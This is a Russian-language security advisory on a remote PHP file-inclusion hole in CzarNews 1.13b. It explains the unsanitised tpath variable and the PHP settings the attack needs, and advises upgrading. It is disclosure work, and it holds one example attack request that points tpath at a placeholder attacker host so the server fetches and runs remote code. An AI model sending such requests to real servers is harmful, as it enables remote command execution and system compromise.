Security Lab

PHP-инклюдинг в CzarNews

Дата публикации:22.03.2005
Дата изменения:24.03.2009
Всего просмотров:1067
Опасность:
Высокая
Наличие исправления: Да
Количество уязвимостей:1
CVE ID: Нет данных
Вектор эксплуатации: Удаленная
Воздействие: Компрометация системы
CWE ID: Нет данных
Наличие эксплоита: Нет данных
Уязвимые продукты: CzarNews 1.x
Уязвимые версии: CzarNews 1.13b

Описание:
Уязвимость позволяет удаленному пользователю выполнить произвольные команды на уязвимой системе с привилегиями web сервера.

Уязвимость существует из-за некорректной обработки входных данных в переменной tpath. Удаленный пользователь может изменить значение этой переменной на произвольный URL и выполнить одноименные сценарии на сервере. Для успешной эксплуатации уязвимости 'register_globals' и 'allow_url_fopen' должны быть включены в конфигурационном файле php на целевом сервере. Пример:

http://192.168.0.115/research/news/CzarNewsv113b
/headlines.php?tpath=http://attackerip/

URL производителя: www.czaries.net/scripts/

Решение: Установите последнюю версию с сайта производителя.

Журнал изменений:
24.03.2009
Изменена секция "Решение"

Ссылки: CzarNews Include File Hole Lets Remote Users Execute Arbitrary Commands